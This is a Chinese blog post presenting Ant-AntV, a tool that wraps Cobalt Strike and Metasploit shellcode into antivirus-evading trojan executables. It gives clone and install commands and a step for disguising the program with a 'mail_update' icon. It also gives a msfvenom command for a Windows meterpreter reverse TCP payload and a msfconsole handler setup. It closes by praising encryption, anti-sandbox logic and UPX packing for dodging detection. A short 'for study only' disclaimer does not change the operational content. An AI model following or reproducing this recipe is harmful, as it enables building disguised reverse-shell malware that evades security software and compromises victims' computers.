本文我们来介绍一款在Cs和Msf中较好的免杀工具吧。

注意: 本文仅供学习和研究。在了解技术和原理的前提下。更好的保护个人信息安全。反对一切危害网络安全的行为!造成法律后果与本文无关。

环境

  • Kali Linux

  • python3.8

    安装

    git clone https://github.com/shellfeel/Ant-AntV
cd Ant-AntV
pip install -r requirements.txt

生成shellcode

这里我们以cs为例。生成.bin格式的。


将生成的shellcode命名成beacon.bin 放到当前bean_raw路径下
如需给程序加上icon,可以将icon命名成mail_update.icon(可修改gen_trojan.py 48行形参out_file_name 来更改,这个参数本身也是生成的程序名)放入resource目录
执行下面命令进行打包程序。

python gen_trojan.py


打包完成后,效果如下

msf

生成shell

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.12.22 LPORT=5555 -f raw -o 1.bin

利用上述同样的方式进行处理
配置msf

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.33
set LPORT 5555
exploit

免杀效果

(再此特别感谢群内小伙伴的测试!)

Cs成功上线

总结

使用随机密钥(混淆加密、shellcode加密),所以每次生成的程序都是全新的,避免被杀软散列标记导致全部失效。支持反沙箱逻辑、支持混淆、支持upx压缩。

版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/3772.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

Kali黑客笔记一键关注
Last modification:January 8, 2023
© Allow specification reprint
正在沿街乞讨中……